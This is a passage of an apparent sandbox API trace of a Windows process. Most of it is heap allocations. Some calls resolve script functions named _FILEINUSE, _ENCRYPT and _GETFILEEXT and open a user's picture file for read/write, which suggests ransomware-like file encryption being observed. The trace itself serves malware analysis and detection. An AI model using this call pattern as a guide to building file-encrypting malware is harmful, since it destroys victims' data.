hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.569] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.569] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.569] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.569] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0041.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.569] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.572] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.574] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca18 [0041.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.575] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0041.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.576] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\skh73r.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.576] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.576] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.576] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.576] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.577] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.577] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.577] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.577] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.577] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.577] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.577] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.577] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.577] CompareStringW (Locale=0x400, 